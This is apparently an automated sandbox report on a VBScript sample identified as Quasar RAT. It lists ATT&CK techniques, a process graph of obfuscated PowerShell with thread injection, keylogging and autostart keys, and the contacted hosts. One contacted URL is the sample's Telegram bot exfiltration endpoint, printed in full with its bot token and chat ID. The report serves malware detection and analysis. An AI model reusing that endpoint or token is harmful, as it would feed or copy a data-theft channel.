                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution                      		1
                      DLL Side-Loading                      		112
                      Process Injection                      		1
                      Software Packing                      		LSASS Memory24
                      System Information Discovery                      		Remote Desktop Protocol1
                      Email Collection                      		1
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts2
                      Command and Scripting Interpreter                      		11
                      Registry Run Keys / Startup Folder                      		11
                      Registry Run Keys / Startup Folder                      		1
                      DLL Side-Loading                      		Security Account Manager141
                      Security Software Discovery                      		SMB/Windows Admin Shares11
                      Input Capture                      		11
                      Encrypted Channel                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      PowerShell                      		Login HookLogin Hook1
                      Masquerading                      		NTDS2
                      Process Discovery                      		Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Modify Registry                      		LSA Secrets41
                      Virtualization/Sandbox Evasion                      		SSHKeylogging14
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items112
                      Process Injection                      		DCSync1
                      System Network Configuration Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Hidden Files and Directories                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1612297 Sample: test.vbs Startdate: 11/02/2025 Architecture: WINDOWS Score: 100 42 api.telegram.org 2->42 44 ipwho.is 2->44 46 api.ipify.org 2->46 68 Suricata IDS alerts for network traffic 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 Yara detected Quasar RAT 2->72 76 7 other signatures 2->76 8 wscript.exe 1 2->8         started        11 mshta.exe 1 2->11         started        13 mshta.exe 1 2->13         started        signatures3 74 Uses the Telegram API (likely for C&C communication) 42->74 process4 signatures5 78 VBScript performs obfuscated calls to suspicious functions 8->78 80 Suspicious powershell command line found 8->80 82 Wscript starts Powershell (via cmd or directly) 8->82 84 4 other signatures 8->84 15 powershell.exe 18 8->15         started        19 cmd.exe 1 8->19         started        21 WmiPrvSE.exe 6 8->21         started        23 powershell.exe 14 15 8->23         started        25 powershell.exe 13 11->25         started        27 powershell.exe 15 13->27         started        process6 dnsIp7 48 193.124.205.6, 443, 49793, 49824 AS-REGRU Russian Federation 15->48 56 Modifies the context of a thread in another process (thread injection) 15->56 58 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->58 60 Installs a global keyboard hook 15->60 29 conhost.exe 15->29         started        62 Suspicious powershell command line found 19->62 64 Wscript starts Powershell (via cmd or directly) 19->64 31 powershell.exe 15 19->31         started        34 conhost.exe 19->34         started        66 Creates autostart registry keys with suspicious values (likely registry only malware) 21->66 50 api.telegram.org 149.154.167.220, 443, 49797 TELEGRAMRU United Kingdom 23->50 52 ipwho.is 195.201.57.90, 443, 49788 HETZNER-ASDE Germany 23->52 54 api.ipify.org 172.67.74.152, 443, 49782 CLOUDFLARENETUS United States 23->54 36 conhost.exe 23->36         started        38 conhost.exe 25->38         started        40 conhost.exe 27->40         started        signatures8 process9 signatures10 86 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 31->86

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      No Antivirus matches

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://ipwho.isp0%Avira URL Cloudsafe
                      http://schemas.datacontract.org/2004/07/Logger0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ipwho.is
                      		195.201.57.90
                      		truefalse
                        		high
                        api.ipify.org
                        		172.67.74.152
                        		truefalse
                          		high
                          api.telegram.org
                          		149.154.167.220
                          		truefalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://api.ipify.org/false
                              		high
                              https://api.telegram.org/bot7813041927:AAFJKTwPluPESj-jsG5TWsi6m7BDKrgz_Rk/sendPhoto?chat_id=-4630316859&parse_mode=Markdownfalse
                                		high
                                https://ipwho.is/false
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://ns.adobe.hotoshpowershell.exe, 00000006.00000002.1594286288.000001BEFA2C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1386901887.0000027F90081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F81B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1386901887.0000027F901DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE3B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1583652727.000001BEF2163000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://ipwho.is/SSELECTpowershell.exe, 00000006.00000002.1507861844.000001BEE3341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1599632881.000001BEFA600000.00000004.08000000.00040000.00000000.sdmpfalse
                                        		high
                                        https://stackoverflow.com/q/14436606/23354powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2591788897.0000022548849000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegram.orgpowershell.exe, 00000006.00000002.1507861844.000001BEE26FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/mgravell/protobuf-netJpowershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://ns.a.0/sTypowershell.exe, 00000006.00000002.1594286288.000001BEFA2C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2591788897.000002254773D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.datacontract.orgpowershell.exe, 00000006.00000002.1507861844.000001BEE26CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE28F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://api.telegram.org/botpowershell.exe, 00000006.00000002.1507861844.000001BEE3341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE26FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1599632881.000001BEFA600000.00000004.08000000.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://ipwho.isppowershell.exe, 00000006.00000002.1507861844.000001BEE2644000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://schemas.datacontract.org/2004/07/powershell.exe, 00000006.00000002.1507861844.000001BEE28F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE26AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2591788897.000002254773D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://go.micropowershell.exe, 00000005.00000002.1372476794.0000027F81197000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE3341000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://contoso.com/Licensepowershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://contoso.com/Iconpowershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://github.com/mgravell/protobuf-netpowershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2591788897.000002254773D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.datacontract.org/2004/07/Loggerpowershell.exe, 00000006.00000002.1507861844.000001BEE26CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE28F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE26AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://api.ipify.orgpowershell.exe, 00000006.00000002.1507861844.000001BEE285E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://api.ipify.orgpowershell.exe, 00000006.00000002.1507861844.000001BEE25DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://github.com/mgravell/protobuf-netipowershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://github.com/mgravell/protobuf-net6powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://stackoverflow.com/q/11564914/23354;powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://stackoverflow.com/q/2152978/23354powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://contoso.com/powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://ipwho.ispowershell.exe, 00000006.00000002.1507861844.000001BEE2883000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1386901887.0000027F90081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F81B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE3B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1583652727.000001BEF2163000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://aka.ms/pscore68powershell.exe, 00000005.00000002.1372476794.0000027F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE20F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2591788897.0000022547481000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://api.telegram.orgpowershell.exe, 00000006.00000002.1507861844.000001BEE26FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://api.telegram.org/bot7813041927:AAFJKTwPluPESj-jsG5TWsi6m7BDKrgz_Rk/sendPhoto?chat_id=-463031powershell.exe, 00000006.00000002.1507861844.000001BEE26FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1598957271.000001BEFA4CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1372476794.0000027F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE20F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2591788897.0000022547481000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://crl.vpowershell.exe, 00000006.00000002.1592989522.000001BEFA143000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://ipwho.ispowershell.exe, 00000006.00000002.1507861844.000001BEE2899000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high

                                                                                                  World Map of Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public IPs

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  149.154.167.220
                                                                                                  		api.telegram.orgUnited Kingdom
                                                                                                  		62041TELEGRAMRUfalse
                                                                                                  193.124.205.6
                                                                                                  		unknownRussian Federation
                                                                                                  		197695AS-REGRUtrue
                                                                                                  172.67.74.152
                                                                                                  		api.ipify.orgUnited States
                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                  195.201.57.90
                                                                                                  		ipwho.isGermany
                                                                                                  		24940HETZNER-ASDEfalse

                                                                                                  General Information

                                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                                  Analysis ID:1612297
                                                                                                  Start date and time:2025-02-11 17:31:27 +01:00
                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                  Overall analysis duration:0h 8m 44s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                  Number of analysed new started processes analysed:20
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample name:test.vbs
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.spyw.expl.evad.winVBS@21/14@3/4
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 66.7%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 88%
                                                                                                  • Number of executed functions: 46
                                                                                                  • Number of non-executed functions: 1
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .vbs

                                                                                                  Warnings

                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
                                                                                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 6104 because it is empty
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
                                                                                                  11:32:29API Interceptor3526877x Sleep call for process: powershell.exe modified

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  149.154.167.220https://doxnero.sg-azure.top/Get hashmaliciousUnknownBrowse
                                                                                                    Air Waybill NO 6979374150 280120289500169465-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      Paypal_Log_Activity_09283.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        https://obnica-sdksdlsdfs-projects.vercel.app/files.htmlGet hashmaliciousUnknownBrowse
                                                                                                          Remittance Advice Copy.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            facturas gastos.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              QUOTE-TM-2025-8489.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                DEKONT(35KB).pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  HSBC SLIP.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                    Factura proforma.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      172.67.74.152Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • api.ipify.org/?format=xml
                                                                                                                      jgbC220X2U.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • api.ipify.org/?format=text
                                                                                                                      malware.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                                                                                                      • api.ipify.org/
                                                                                                                      Simple1.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • api.ipify.org/
                                                                                                                      Simple2.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • api.ipify.org/
                                                                                                                      systemConfigChecker.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • api.ipify.org/
                                                                                                                      systemConfigChecker.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • api.ipify.org/
                                                                                                                      2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • api.ipify.org/
                                                                                                                      Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • api.ipify.org/
                                                                                                                      67065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                      • api.ipify.org/
                                                                                                                      195.201.57.90sender.exeGet hashmaliciousLuca StealerBrowse
                                                                                                                      • /?output=json
                                                                                                                      sender.exeGet hashmaliciousLuca StealerBrowse
                                                                                                                      • /?output=json
                                                                                                                      Flash_USDT_Sender.exeGet hashmaliciousLuca StealerBrowse
                                                                                                                      • /?output=json
                                                                                                                      Flash_USDT_Sender.exeGet hashmaliciousLuca StealerBrowse
                                                                                                                      • /?output=json
                                                                                                                      SPt4FUjZMt.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, PythonCryptoHijacker, RedLineBrowse
                                                                                                                      • /?output=json
                                                                                                                      765iYbgWn9.exeGet hashmaliciousLuca StealerBrowse
                                                                                                                      • /?output=json
                                                                                                                      765iYbgWn9.exeGet hashmaliciousLuca StealerBrowse
                                                                                                                      • /?output=json
                                                                                                                      WfKynArKjH.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, RedLineBrowse
                                                                                                                      • /?output=json
                                                                                                                      ubes6SC7Vd.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • ipwhois.app/xml/
                                                                                                                      cOQD62FceM.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                                                                                      • /?output=json

                                                                                                                      Domains

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      ipwho.is0LjWxSZsxM.exeGet hashmaliciousQuasarBrowse
                                                                                                                      • 195.201.57.90
                                                                                                                      SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeGet hashmaliciousQuasarBrowse
                                                                                                                      • 195.201.57.90
                                                                                                                      uB4F7gRNPM.exeGet hashmaliciousQuasarBrowse
                                                                                                                      • 195.201.57.90
                                                                                                                      uDF9cf2ziK.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                      • 195.201.57.90
                                                                                                                      rH3TpuMpZn.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Quasar, RedLine, VidarBrowse
                                                                                                                      • 195.201.57.90
                                                                                                                      https://howareutoday.com:443/xxxjGet hashmaliciousTechSupportScamBrowse
                                                                                                                      • 195.201.57.90
                                                                                                                      jVxEM7I2hF.exeGet hashmaliciousQuasarBrowse
                                                                                                                      • 195.201.57.90
                                                                                                                      314e9bbe1e43938595f774fe97f4926c9f169493f9ea6.exeGet hashmaliciousQuasarBrowse
                                                                                                                      • 195.201.57.90
                                                                                                                      http://tessta.pages.dev/Wi0n0ALxerrinf0x0876Get hashmaliciousTechSupportScamBrowse
                                                                                                                      • 195.201.57.90
                                                                                                                      http://dro.pm/axGet hashmaliciousQuasarBrowse
                                                                                                                      • 195.201.57.90
                                                                                                                      api.telegram.orghttps://doxnero.sg-azure.top/Get hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Air Waybill NO 6979374150 280120289500169465-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Paypal_Log_Activity_09283.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://obnica-sdksdlsdfs-projects.vercel.app/files.htmlGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Remittance Advice Copy.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      facturas gastos.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      QUOTE-TM-2025-8489.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      DEKONT(35KB).pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      HSBC SLIP.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Factura proforma.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      api.ipify.orgonlick_photo_downloader.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 172.67.74.152
                                                                                                                      https://www.netigate.se/ra/s.aspx?s=1257251X472839856X91309Get hashmaliciousUnknownBrowse
                                                                                                                      • 172.67.74.152
                                                                                                                      R1TftmQpuQ.batGet hashmaliciousTargeted RansomwareBrowse
                                                                                                                      • 104.26.13.205
                                                                                                                      uki9iUoEre.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                                                                      • 104.26.13.205
                                                                                                                      payment copy.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 104.26.12.205
                                                                                                                      https://primenode.live/Get hashmaliciousUnknownBrowse
                                                                                                                      • 172.67.74.152
                                                                                                                      rIMG_1160_3079.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 104.26.13.205
                                                                                                                      https://www.canva.com/design/DAGevAFBxwg/Bokr_tYsAyC8sQoBqsS-9A/view?utm_content=DAGevAFBxwg&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=ha9dfea6f83Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 172.67.74.152
                                                                                                                      https://privitibindmsteringmastodon.glitch.me:443/#amltX2hvd2FyZEBvdXRsb29rLmNvbQGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.26.12.205
                                                                                                                      EMAILMING BANK PAPER PAYMENT OF USD 8,8867.06.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 104.26.12.205

                                                                                                                      ASNs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      TELEGRAMRU3e#U043d.docGet hashmaliciousEternity StealerBrowse
                                                                                                                      • 149.154.167.99
                                                                                                                      https://doxnero.sg-azure.top/Get hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Air Waybill NO 6979374150 280120289500169465-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Paypal_Log_Activity_09283.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://obnica-sdksdlsdfs-projects.vercel.app/files.htmlGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Remittance Advice Copy.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      21ruAkL7XB.exeGet hashmaliciousAmadey, VidarBrowse
                                                                                                                      • 149.154.167.99
                                                                                                                      facturas gastos.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      QUOTE-TM-2025-8489.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      DEKONT(35KB).pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      HETZNER-ASDEtOpxHK0Z2U.batGet hashmaliciousRemcosBrowse
                                                                                                                      • 168.119.145.117
                                                                                                                      5kldoushde.batGet hashmaliciousRemcosBrowse
                                                                                                                      • 168.119.145.117
                                                                                                                      puDUCOeVK6.batGet hashmaliciousRemcosBrowse
                                                                                                                      • 168.119.145.117
                                                                                                                      As7KZaO9Dy.batGet hashmaliciousRemcosBrowse
                                                                                                                      • 168.119.145.117
                                                                                                                      uowzo4rEa5.batGet hashmaliciousRemcosBrowse
                                                                                                                      • 168.119.145.117
                                                                                                                      3e#U043d.docGet hashmaliciousEternity StealerBrowse
                                                                                                                      • 5.75.168.247
                                                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                      • 88.198.246.242
                                                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                      • 88.198.246.242
                                                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                      • 88.198.246.242
                                                                                                                      0LjWxSZsxM.exeGet hashmaliciousQuasarBrowse
                                                                                                                      • 195.201.57.90
                                                                                                                      AS-REGRUcrypt.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.58.112.174
                                                                                                                      NOAH CRYPT.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.58.112.174
                                                                                                                      file.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.58.112.174
                                                                                                                      X4pCdhjJCI.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.58.112.174
                                                                                                                      vmEBHny0Jw.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.58.112.174
                                                                                                                      1wMow0yFjm.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.58.112.174
                                                                                                                      fnn6g1xT1Y.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.58.112.174
                                                                                                                      QUOTE#230188.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 31.31.196.17
                                                                                                                      Payment slip.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                      • 31.31.196.17
                                                                                                                      Enquiry.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                      • 194.58.112.174
